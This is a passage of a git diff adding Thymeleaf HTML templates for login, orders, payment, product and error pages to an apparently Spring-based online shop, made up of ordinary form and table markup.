+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <form th:object="${commentForm}" class="form-horizontal" method="POST">
+                        <input type="hidden" th:field="*{productId}"/>
+                        <div class="form-group row">
+                           <label for="name" class="col-3 text-right input-label-middle-rating" 
+                                  th:text="#{comment.rate}"/>
+                           <div class="input-group col-9 text-center">
+                              <input type="text" class="rating-loading" th:field="*{rating}"/>
+                           </div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="address" class="col-3 text-right" th:text="#{comment.text}"></label>
+                           <div class="input-group col-9 col-sm-7">
+                              <textarea th:field="*{text}" class="form-control" id="text" name="text" rows="3"
+                                        th:errorclass="error"
+                                        data-validation-error-msg-container="#input-text-error"
+                                        data-validation="required"
+                                 th:attr="data-validation-error-msg=#{comment.text.validation}">
+                              </textarea>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-text-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <div class="col-3"></div>
+                           <div class="input-group col-9">
+                              <button type="submit" class="btn btn-primary" th:text="#{comment.button}"></button>
+                           </div>
+                        </div>
+                     </form>
+                  </div>
+               </div>
+            </div>
+         </div>
+      </div>
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/Error.html b/src/main/resources/templates/Error.html
new file mode 100644
index 0000000..d0ec8c6
--- /dev/null
+++ b/src/main/resources/templates/Error.html
@@ -0,0 +1,49 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+      <div class="container error">
+         <div class="row">
+            <div class="col-12">
+               <h2 th:text="#{error.title}"></h2>
+               <hr>
+            </div>
+         </div>
+         <p th:if="${url}">
+            <b th:text="#{error.page}"></b> <span th:text="${url}"></span>
+         </p>
+         <p th:if="${timestamp}" id='created'>
+            <b th:text="#{error.time}"></b> <span th:text="${timestamp}"></span>
+         </p>
+         <p th:if="${status}">
+            <b th:text="#{error.status}"></b> <span th:text="${status}"></span> <span
+                th:if="${error}" th:text="'('+${error}+')'"></span>
+         </p>
+         
+         <div th:if="${errorMessage} and ${errorMessage.length() != 0}">
+            <span th:if="${errorMessage} and ${errorMessage.length() != 0}" th:text="${errorMessage}"></span>
+         </div>
+         
+         <div th:if="${exception}">
+            <div th:if="${exception instanceof T(java.lang.Exception)}" class="text-left">              
+            </div>
+            <div th:if="${exception instanceof T(java.lang.String)}">
+               <b th:text="#{error.cause}"></b>
+               <span th:text="${exception}"></span>
+            </div>
+         </div>
+         
+         <p th:if="${trace}" class="text-left">
+            <br/>
+            <span th:text="${trace}"></span>
+         </p>
+         
+      </div>
+      
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+      
+   </body>
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/Index.html b/src/main/resources/templates/Index.html
new file mode 100644
index 0000000..11a5ee7
--- /dev/null
+++ b/src/main/resources/templates/Index.html
@@ -0,0 +1,52 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <div class="container home">
+
+         <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+         <div th:block>
+            <div th:fragment="card-fragment(category)" th:if="${category != null}">
+               <div class="card mx-auto text-center bg-light">
+                  <a th:href="@{/products(category=${category.name})}">
+                     <i class="fas fa-5x" th:classappend="${category.icon}"></i>
+                     <div class="card-body">
+                        <h5 class="card-title" th:text="${category.name}"></h5>
+                        <h6 class="card-subtitle mb-2 text-muted truncate" 
+                            th:text="${category.description}"></h6>
+                     </div>
+                  </a>
+               </div>
+            </div>
+         </div>         
+
+         <div class="align-middle vh-100">
+            <div class="row h-50 justify-content-end align-items-end">
+               <div class="col-6">
+                  <div th:replace="this :: card-fragment (category=${categories[0]})"></div>
+               </div>
+               <div class="col-6 align-bottom">
+                  <div th:replace="this :: card-fragment (category=${categories[1]})"></div>
+               </div>
+            </div>
+            <div class="row h-50">
+               <div class="col-6">
+                  <div th:replace="this :: card-fragment (category=${categories[2]})"></div>
+               </div>
+               <div class="col-6">
+                  <div th:replace="this :: card-fragment (category=${categories[3]})"></div>
+               </div>
+            </div>
+
+         </div>
+      </div>
+
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/Login.html b/src/main/resources/templates/Login.html
new file mode 100644
index 0000000..19c2697
--- /dev/null
+++ b/src/main/resources/templates/Login.html
@@ -0,0 +1,111 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             doConfigureFormValidation();
+         });
+      </script>
+
+      <div class="container login">
+
+         <div class="row w-100">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{login.title}"></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <form th:object="${loginForm}" class="form-horizontal toggle-disabled" method="POST">
+                        <div class="form-group row">
+                           <label for="email" class="d-none d-sm-block col-sm-3 text-right input-label-middle"
+                                  th:text="#{profile.input.email}"></label>
+                           <div class="input-group col-12 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-at"></i></span>
+                              </div>
+                              <input th:field="*{email}" type="email" class="form-control" id="email" name="email"
+                                     th:placeholder="#{profile.input.email.placeholder}"
+                                     th:errorclass="error"
+                                     data-validation-error-msg-container="#input-email-error"
+                                     data-validation="email"
+                                     th:attr="data-validation-error-msg=#{profile.input.email.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="d-none d-sm-block col-sm-3"></div>
+                           <div class="col-12 col-sm-6 text-left" id="input-email-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="password" class="d-none d-sm-block col-sm-3 text-right input-label-middle"
+                                  th:text="#{profile.input.password}"></label>
+                           <div class="input-group col-12 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-lock"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="password" name="password"
+                                     th:placeholder="#{login.input.password.placeholder}"
+                                     data-validation-error-msg-container="#input-password-error"
+                                     data-validation="length" data-validation-length="min4"
+                                     th:attr="data-validation-error-msg=#{login.input.password.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="d-none d-sm-block col-sm-3"></div>
+                           <div class="col-12 col-sm-9 text-left" id="input-password-error"></div>
+                        </div>
+
+                        <div class="form-group row ui-helper-margin-top-decrease">
+                           <div class="d-none d-sm-block col-sm-3"></div>
+                           <div class="input-group col-12 col-sm-9">
+                              <label class="form-check-label input-label-middle">
+                                 <input type="checkbox" th:field='*{rememberMe}' 
+                                        class="form-check-input">
+                                 <span th:text="#{login.remember.me}"></span>
+                              </label>
+                           </div>
+                        </div>
+
+                        <div class="form-group row ui-helper-margin-top-decrease">
+                           <div class="d-none d-sm-block col-sm-3"></div>
+                           <div class="input-group col-12 col-sm-9">
+                              <label class="form-check-label input-label-middle">
+                                 <a class="" id="remove-image-link" href="/sendEmail">
+                                    <span th:text="#{login.forgot.password}"></span>   
+                                 </a>
+                              </label>
+                           </div>
+                        </div>
+
+                        <div class="form-group row">
+                           <div class="d-none d-sm-block col-sm-3"></div>
+                           <div class="input-group col-12 col-sm-9">
+                              <button type="submit" class="btn btn-primary" th:text="#{login.button}"></button>
+                           </div>
+                        </div>
+                     </form>
+
+                  </div>
+               </div>
+            </div>
+         </div>
+
+      </div>
+
+   </div>
+
+   <div th:replace="layout/Footer :: #footer-fragment"></div>
+</body>
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/Order.html b/src/main/resources/templates/Order.html
new file mode 100644
index 0000000..0651dec
--- /dev/null
+++ b/src/main/resources/templates/Order.html
@@ -0,0 +1,148 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+      <div th:replace="layout/Modal :: #modal-fragment"></div>
+
+      <script th:inline="javascript">
+         /*<![CDATA[*/
+         $(document).ready(function () {
+            doCreateRatings(true, 'sd');
+            doConfigureFormValidation();
+            $('table').DataTable({
+               paging: false,
+               ordering: false,
+               info: false,
+               filter: false
+            });
+            $(':radio[name="defaultAddress"]').change(function () {
+               $('textarea').prop('disabled', $(this).hasClass('radio-off'));
+            });
+            $('#cancel-order-button').click(function (e) {
+               e.preventDefault();
+               var message = /*[[#{confirm.cancel.order}]]*/ DEFAULT_CONFIRM_MESSAGE;
+               doConfirm(message, function () {
+                  $('#cancel-order-button').closest('form').submit();
+               });
+            });
+         });
+         /*]]>*/
+      </script>
+
+      <div class="container order">
+
+         <div class="row w-100 mx-auto">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+
+
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{order.title} + ' ' + ${order.name}" ></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+
+                     <div class="form-group row">
+                        <label class="col-6 text-right" th:text="#{order.total.price}"></label>
+                        <div class="col-6 text-left">
+                           <span th:text="${order.price}"></span>&euro;
+                        </div>
+                     </div>
+
+                     <div class="form-group row">
+                        <label class="col-6 text-right" th:text="#{order.date}"></label>
+                        <div class="col-6 text-left">
+                           <span th:text="${#dates.format(order.timestamp, 'yyyy-MM-dd hh:mm')}">
+                           </span>
+                        </div>
+                     </div>
+                     <div class="form-group row">
+                        <label for="address" class="col-6 text-right" th:text="#{order.address}"></label>
+                        <div class="input-group col-6">
+                           <span th:text="${order.address}"></span>
+                        </div>
+                     </div>
+                     <div class="form-group row ui-helper-margin-bottom-decrease" 
+                          th:if="${order.state.name() != 'PENDING'}">
+                        <label class="col-6 text-right" th:text="#{order.state}"></label>
+                        <div class="col-6 text-left">
+                           <span th:if="${order.state.name() == 'CANCELLED'}" th:title="#{order.already.cancelled}" 
+                                 class="fa fa-times-circle fa-lg text-danger">
+                           </span>
+                           <span th:if="${order.state.name() == 'COMPLETED'}" th:title="#{order.already.completed}" 
+                                 class="fa fa-certificate text-success fa-lg"></span>
+                        </div>                     
+                     </div>
+                     <div class="row w-100 mx-auto" th:if="${order.state.name() == 'PENDING'}">
+                        <div class="col">
+                           <form method="GET" th:action="@{/orders/{id}/pay(id=${order.orderId})}" class="d-inline">
+                              <button class="btn btn-sm btn-success" type="submit">
+                                 <i class="fa fa-credit-card"></i>&nbsp;
+                                 <span th:text="#{order.pay.now}"></span>
+                              </button>
+                           </form>
+                           <form method="POST" th:action="@{/orders/{id}/cancel(id=${order.orderId})}"
+                                 class="d-inline">
+                              <button class="btn btn-sm btn-danger" type="button" id="cancel-order-button">
+                                 <i class="fa fa-times-circle"></i>&nbsp;
+                                 <span th:text="#{order.cancel}"></span>
+                              </button>                              
+                           </form>
+                        </div>
+                     </div>
+                  </div>
+               </div>
+            </div>
+         </div>
+
+         <div class="row w-100 mx-auto">
+            <div class="col ui-helper-margin-top">
+               <table class="table table-striped dt-responsive w-100" >
+                  <thead>
+                     <tr>
+                        <th data-priority="2" data-orderable="false" data-order="false"></th>
+                        <th data-priority="1" th:text="#{product.name}"></th>
+                        <th data-priority="5" th:text="#{product.description}"></th>
+                        <th data-priority="4" th:text="#{product.category}"></th>
+                        <th data-priority="3" th:text="#{product.rating}"></th>
+                        <th data-priority="2" th:text="#{product.price}"></th>
+                        <th data-priority="2"><i class="fas fa-search"></i></th>
+                     </tr>
+                  </thead>
+                  <tbody>
+                     <tr th:each="orderLine,status  : ${order.orderLines}">
+                        <td class="align-middle"><i class="fas" th:classappend="${orderLine.product.icon}"></i></td>
+                        <td class="align-middle">
+                           <span th:text="${orderLine.product.name}" 
+                                 th:title="${orderLine.product.description}"></span>
+                        </td>
+                        <td th:text="${orderLine.product.description}"></td>
+                        <td class="align-middle" th:text="${orderLine.product.category.name}"></td>
+                        <td class="align-middle">
+                           <input type="text" class="rating-loading" th:value="${orderLine.product.rating}"/>
+                        </td>
+                        <td class="align-middle"><span th:text="${orderLine.price}"></span><span>&euro;</span></td>
+                        <td class="align-middle">
+                           <form method="GET" th:action="@{/products/{id}(id=${orderLine.product.productId})}">
+                              <button class="btn btn-sm btn-success" type="submit">
+                                 <i class="fa fa-search"></i>
+                              </button>
+                           </form>
+                        </td>
+                     </tr>
+                  </tbody>
+               </table>
+            </div>
+         </div>
+      </div>
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
diff --git a/src/main/resources/templates/OrderConfirm.html b/src/main/resources/templates/OrderConfirm.html
new file mode 100644
index 0000000..a6e4fdb
--- /dev/null
+++ b/src/main/resources/templates/OrderConfirm.html
@@ -0,0 +1,155 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             doCreateRatings(true, 'sd');
+             doConfigureFormValidation();
+             $('table').DataTable({
+                 paging: false,
+                 ordering: false,
+                 info: false,
+                 filter: false
+             });
+             $(':radio[name="defaultAddress"]').change(function () {
+                 $('textarea').prop('disabled', $(this).hasClass('radio-off'));
+             });
+             $('button[type="submit"]').click(function () {
+                 $('input[name="payNow"]').val($(this).data('pay'));
+             });
+         });
+      </script>
+
+      <div class="container new-order">
+
+         <div class="row w-100 mx-auto">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+
+
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{new.order.title}" ></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <div class="row mx-auto w-100" th:if="${products.size() == 0}">
+                        <div class="col">
+                           <div class="alert alert-warning">
+                              <span th:text="#{shopping.cart.empty}"></span>
+                           </div>               
+                        </div>
+                     </div>
+
+                     <form th:object="${orderForm}" class="form-horizontal" method="POST" 
+                           th:if="${products.size() >0}"
+                           th:action="@{/orders}">
+                        <input type="hidden" th:field="*{payNow}"/>
+                        <input type="hidden" th:field="*{name}"/>
+                        <input type="hidden" th:field="*{price}"/>
+                        <input th:each="product : ${products}" type="hidden" 
+                               name="products[]" th:value="${product.productId}"/>
+                        <div class="form-group row">
+                           <label class="col-4 text-right" th:text="#{order.total.price}"></label>
+                           <div class="col-8 text-left">
+                              <span th:text="${orderForm.price}"></span>&euro;
+                           </div>
+                        </div>
+                        <div class="form-group row">
+                           <div class="d-none d-sm-block col-sm-4"></div>
+                           <div class="input-group col-12 col-sm-8">
+                              <label class="form-check-label">
+                                 <input type="radio" name="defaultAddress" value="true" 
+                                        class="radio-off form-check-input" checked>
+                                 <span th:text="#{order.default.address}"></span>
+                              </label>
+                           </div>
+                        </div>
+                        <div class="form-group row">
+                           <div class="d-none d-sm-block col-sm-4"></div>
+                           <div class="input-group col-12 col-sm-8 text-left">
+                              <label class="form-check-label">
+                                 <input type="radio" name="defaultAddress" value="false" 
+                                        class="radio-on form-check-input">
+                                 <span th:text="#{order.different.address}"></span>
+                              </label>
+                           </div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="address" class="col-4 text-right" th:text="#{order.address}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <textarea th:field="*{address}" class="form-control" id="address" name="address" rows="3"
+                                        th:errorclass="error"
+                                        data-validation-error-msg-container="#input-address-error"
+                                        data-validation="required"
+                                        th:attr="data-validation-error-msg=#{profile.input.address.validation}"
+                                        disabled="true"></textarea>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-4"></div>
+                           <div class="col-8 text-left" id="input-address-error"></div>
+                        </div>
+                        <div class="row w-100 mx-auto">
+                           <div class="col-12 text-center">
+                              <button class="btn btn-sm btn-success" type="submit"
+                                      data-pay="true">
+                                 <i class="fa fa-shopping-cart"></i>&nbsp;
+                                 <span th:text="#{order.buy.and.pay}"></span>
+                              </button>
+                              <button class="btn btn-sm btn-secondary d-none d-sm-inline" type="submit"
+                                      data-pay="false">
+                                 <i class="fa fa-shopping-cart"></i>&nbsp;
+                                 <span th:text="#{order.buy.and.pay.later}"></span>
+                              </button>
+                           </div>
+                        </div>  
+                     </form>
+
+                  </div>
+               </div>
+            </div>
+         </div>
+
+         <div class="row w-100 mx-auto" th:if="${products.size() > 0}">
+            <div class="col ui-helper-margin-top">
+               <table class="table table-striped dt-responsive w-100" >
+                  <thead>
+                     <tr>
+                        <th data-priority="2" data-orderable="false" data-order="false"></th>
+                        <th data-priority="1" th:text="#{product.name}"></th>
+                        <th data-priority="5" th:text="#{product.description}"></th>
+                        <th data-priority="4" th:text="#{product.category}"></th>
+                        <th data-priority="3" th:text="#{product.rating}"></th>
+                        <th data-priority="2" th:text="#{product.price}"></th>
+                     </tr>
+                  </thead>
+                  <tbody>
+                     <tr th:each="product,status  : ${products}">
+                        <td class="align-middle"><i class="fas" th:classappend="${product.icon}"></i></td>
+                        <td class="align-middle">
+                           <span th:text="${product.name}" th:title="${product.description}"></span></td>
+                        <td th:text="${product.description}"></td>
+                        <td class="align-middle" th:text="${product.category.name}"></td>
+                        <td class="align-middle">
+                           <input type="text" class="rating-loading" th:value="${product.rating}"/>
+                        </td>
+                        <td class="align-middle"><span th:text="${product.price}"></span><span>&euro;</span></td>
+                     </tr>
+                  </tbody>
+               </table>
+            </div>
+         </div>
+      </div>
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
diff --git a/src/main/resources/templates/Orders.html b/src/main/resources/templates/Orders.html
new file mode 100644
index 0000000..7897698
--- /dev/null
+++ b/src/main/resources/templates/Orders.html
@@ -0,0 +1,88 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             $('table').DataTable({
+                 paging: false,
+                 ordering: false,
+                 info: false,
+                 filter: false
+             });
+         });
+      </script>
+
+      <div class="container orders">
+
+         <div class="row mx-auto">
+            <div class="col-12 form-title">
+               <h2 th:text="#{orders.title}" ></h2>
+            </div>
+         </div>
+
+         <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+         <div class="row w-100 mx-auto" th:if="${orders.size() == 0}">
+            <div class="col">
+               <div class="alert alert-warning">
+                  <span th:text="#{orders.empty.table}"></span>
+               </div>               
+            </div>
+         </div>
+
+         <div class="row w-100 mx-auto" th:if="${orders.size() > 0}">
+            <div class="col ui-helper-margin-top">
+               <table class="table table-striped dt-responsive w-100" >
+                  <thead>
+                     <tr>
+                        <th data-priority="1" th:text="#{order.name}"></th>
+                        <th data-priority="3" th:text="#{order.date}"></th>
+                        <th data-priority="2" th:text="#{order.price}"></th>
+                        <th data-priority="4" th:text="#{order.state}"></th>
+                        <th data-priority="2"><i class="fas fa-search"></i></th>
+                     </tr>
+                  </thead>
+                  <tbody>
+                     <tr th:each="order,status  : ${orders}">
+                        <td class="align-middle">
+                           <span th:text="${order.name}" ></span>
+                        </td>
+                        <td class="align-middle">
+                           <span th:text="${#dates.format(order.timestamp, 'yyyy-MM-dd hh:mm')}" ></span>
+                        </td>
+                        <td class="align-middle">
+                           <span th:text="${order.price}"></span><span>&euro;</span>
+                        </td>
+                        <td class="align-middle">
+                           <span th:if="${order.state.name() == 'CANCELLED'}" th:title="#{order.already.cancelled}" 
+                                 class="fa fa-times-circle fa-lg text-danger">
+                           </span>
+                           <span th:if="${order.state.name() == 'PENDING'}" th:title="#{order.pending}" 
+                                 class="fa fa-clock text-warning fa-lg"></span>
+                           <span th:if="${order.state.name() == 'COMPLETED'}" th:title="#{order.already.completed}" 
+                                 class="fa fa-certificate fa-lg text-success"></span>
+                        </td>
+                        <td class="align-middle">
+                           <form method="GET" th:action="@{/orders/{id}(id=${order.orderId})}">
+                              <button class="btn btn-sm btn-success" type="submit">
+                                 <i class="fa fa-search"></i>
+                              </button>
+                           </form>
+                        </td>
+                     </tr>
+                  </tbody>
+               </table>
+            </div>
+         </div>
+      </div>
+
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
+
diff --git a/src/main/resources/templates/Payment.html b/src/main/resources/templates/Payment.html
new file mode 100644
index 0000000..98625ef
--- /dev/null
+++ b/src/main/resources/templates/Payment.html
@@ -0,0 +1,181 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             doConfigureFormValidation();
+             doConfigureInputMasking();
+             $(':radio[name="defaultCreditCard"]').change(function () {
+                 $('.credit-card-input').prop('disabled', $(this).hasClass('radio-off'));
+             });
+             $('button[type="submit"]').click(function () {
+                 $('input[name="pay"]').val($(this).data('pay'));
+             });
+         });
+      </script>
+
+      <div class="container new-order">
+
+         <div class="row w-100">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+
+
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{new.order.title}" ></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <form th:object="${paymentForm}" class="form-horizontal" method="POST" 
+                           th:action="@{/orders/{id}/pay(id=${order.orderId})}">
+                        <div class="form-group row" th:if="${session['user'].card != null}">
+                           <div class="d-none d-sm-block col-sm-4"></div>
+                           <div class="input-group col-12 col-sm-8">
+                              <label class="form-check-label">
+                                 <input type="radio" name="defaultCreditCard" value="true" 
+                                        class="radio-off form-check-input" checked>
+                                 <span th:text="#{payment.default.card} + ' #' + 
+                                       ${#strings.substring(session['user'].card.card,12,16)}"></span>
+                              </label>
+                           </div>
+                        </div>
+                        <div class="form-group row" th:if="${session['user'].card != null}">
+                           <div class="d-none d-sm-block col-sm-4"></div>
+                           <div class="input-group col-12 col-sm-8">
+                              <label class="form-check-label">
+                                 <input type="radio" name="defaultCreditCard" value="false" 
+                                        class="radio-on form-check-input">
+                                 <span th:text="#{payment.different.card}"></span>
+                              </label>
+                           </div>
+                        </div>
+                        <div class="form-group row">
+                           <div class="col-4 text-right input-label-middle">
+                              <i class="fab fa-cc-visa fa-lg"></i>
+                              <i class="fab fa-cc-mastercard fa-lg"></i>
+                              <i class="fab fa-cc-amex fa-lg"></i>
+                           </div>
+                           <div class="input-group col-8 col-sm-6">
+                              <input th:field="*{creditCard}" class="form-control credit-card-input" 
+                                     data-inputmask="'mask': '9999999999999999'"
+                                     th:errorclass="error"
+                                     data-validation-error-msg-container="#input-card-error"
+                                     data-validation="required creditcard"
+                                     th:attr="data-validation-error-msg=#{payment.input.card.validation}"
+                                     th:disabled="${session['user'].card != null}"></input>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-4"></div>
+                           <div class="col-8 col-sm-6 text-left" id="input-card-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="cvv" class="col-4 text-right input-label-middle" th:text="#{payment.cvv}">
+                           </label>
+                           <div class="input-group col-8 col-sm-6">
+                              <input th:field="*{cvv}" class="form-control credit-card-input" 
+                                     data-inputmask="'mask': '999'"
+                                     th:errorclass="error" maxlength="3"
+                                     data-validation-error-msg-container="#input-cvv-error"
+                                     data-validation="cvv"
+                                     th:attr="data-validation-error-msg=#{payment.input.cvv.validation}"
+                                     th:disabled="${session['user'].card != null}"></input>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-4"></div>
+                           <div class="col-8 col-sm-6 text-left" id="input-cvv-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="cvv" class="col-4 text-right input-label-middle" 
+                                  th:text="#{payment.expiration.month}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <select th:field="*{expirationMonth}" class="form-control credit-card-input" 
+                                      th:errorclass="error" data-validation="required"
+                                      data-inputmask-clearincomplete="true"
+                                      data-validation-error-msg-container="#input-expiration-month-error"
+                                      th:attr="data-validation-error-msg=#{payment.input.expiration.month.validation}"
+                                      th:disabled="${session['user'].card != null}">
+                                 <option value=''  th:text="#{month.select}"></option>
+                                 <option value='1' th:text="#{month.1}">January</option>
+                                 <option value='2' th:text="#{month.2}">February</option>
+                                 <option value='3' th:text="#{month.3}">March</option>
+                                 <option value='4' th:text="#{month.4}">April</option>
+                                 <option value='5' th:text="#{month.5}">May</option>
+                                 <option value='6' th:text="#{month.6}">June</option>
+                                 <option value='7' th:text="#{month.7}">July</option>
+                                 <option value='8' th:text="#{month.8}">August</option>
+                                 <option value='9' th:text="#{month.9}">September</option>
+                                 <option value='10' th:text="#{month.10}">October</option>
+                                 <option value='11' th:text="#{month.11}">November</option>
+                                 <option value='12' th:text="#{month.12}">December</option>
+                              </select>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-4"></div>
+                           <div class="col-8 col-sm-6 text-left" id="input-expiration-month-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="cvv" class="col-4 text-right input-label-middle" 
+                                  th:text="#{payment.expiration.year}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <select th:field="*{expirationYear}" class="form-control credit-card-input" 
+                                      th:errorclass="error" data-validation="required"
+                                      data-validation-error-msg-container="#input-expiration-year-error"
+                                      th:attr="data-validation-error-msg=#{payment.input.expiration.year.validation}"
+                                      th:disabled="${session['user'].card != null}">
+                                 <option value='' th:text="#{year.select}"></option>
+                                 <option value='2019'>2019</option>
+                                 <option value='2020'>2020</option>
+                                 <option value='2020'>2021</option>
+                                 <option value='2020'>2022</option>
+                                 <option value='2020'>2023</option>
+                                 <option value='2020'>2024</option>
+                                 <option value='2020'>2025</option>
+                              </select>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-4"></div>
+                           <div class="col-8 col-sm-6 text-left" id="input-expiration-year-error"></div>
+                        </div>
+                        <div class="form-group row ui-helper-margin-top-decrease">
+                           <div class="col-4"></div>
+                           <div class="input-group col-8">
+                              <label class="form-check-label input-label-middle">
+                                 <input type="checkbox" th:field='*{save}' 
+                                        class="credit-card-input form-check-input"
+                                        th:disabled="${session['user'].card != null}">
+                                 <span th:text="#{payment.set.as.default.card}"></span>
+                              </label>
+                           </div>
+                        </div>
+                        <div class="row w-100">
+                           <div class="col">
+                              <button class="btn btn-sm btn-success" type="submit" >
+                                 <i class="fa fa-credit-card"></i>&nbsp;
+                                 <span th:text="#{payment.pay.button}"></span>
+                              </button>
+                           </div>
+                        </div>  
+                     </form>
+
+                  </div>
+               </div>
+            </div>
+         </div>
+      </div>
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
diff --git a/src/main/resources/templates/Product.html b/src/main/resources/templates/Product.html
new file mode 100644
index 0000000..e3b378a
--- /dev/null
+++ b/src/main/resources/templates/Product.html
@@ -0,0 +1,88 @@
+<!DOCTYPE HTML>
+<html>
+
+    <header th:replace="layout/Includes :: #include-fragment"></header>
+
+    <body>
+
+        <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+        <script>
+            $(document).ready(function () {
+                doCreateRatings(true, 'sd');
+            });
+        </script>
+
+        <div class="container product">
+
+            <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+            <div class="row w-100 mx-auto">
+                <div th:classappend="${product.comments.size() > 0 ? 'col-6' : 'col-12'}">
+                    <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                        <div class="card-body">
+                            <i class="fas fa-5x" th:classappend="${product.icon}"></i>
+                            <h5 class="card-title ui-helper-margin-top" th:text="${product.name}"></h5>
+                            <h6 class="card-subtitle mb-2 text-muted truncate" th:text="${product.description}"></h6>
+                            <div class="ui-helper-margin-top">
+                                <span class="font-weight-bold" th:text="#{product.price}"></span>
+                                <span th:text="${product.price}"></span>
+                                <span>&euro;</span>
+                            </div>
+                            <div class="ui-helper-margin-top">
+                                <span class="font-weight-bold" th:text="#{product.total.sales}"></span>
+                                <span th:text="${product.sales}"></span>
+                            </div>
+                            <div class="ui-helper-margin-top">
+                                <input type="text" class="rating-loading" th:value="${product.rating}"/>
+                            </div>
+                            <div class="ui-helper-margin-top" >
+                                <form method="POST" th:action="@{/products/{id}/addToCart(id=${product.productId})}"
+                                      th:if="${!session['shoppingCart'].contains(product.productId)}"
+                                      class="d-inline">
+                                    <button class="btn btn-sm btn-success" type="submit">
+                                        <i class="fa fa-shopping-cart"></i>&nbsp;
+                                        <span th:text="#{product.add.to.cart}"></span>
+                                    </button>
+                                </form>
+                                <form method="GET" th:action="@{/products/{id}/rate(id=${product.productId})}"
+                                      th:if="${buyByUser}"
+                                      class="d-inline">
+                                    <button class="btn btn-sm btn-success" type="submit">
+                                        <i class="fa fa-thumbs-up"></i>&nbsp;
+                                        <span th:text="#{add.or.edit.comment.button}"></span>
+                                    </button>
+                                </form>
+                            </div>
+                        </div>
+                    </div>
+                </div>
+                <div class="col-6" th:if="${product.comments.size() > 0}">
+                    <div th:each="comment, status  : ${product.comments}" 
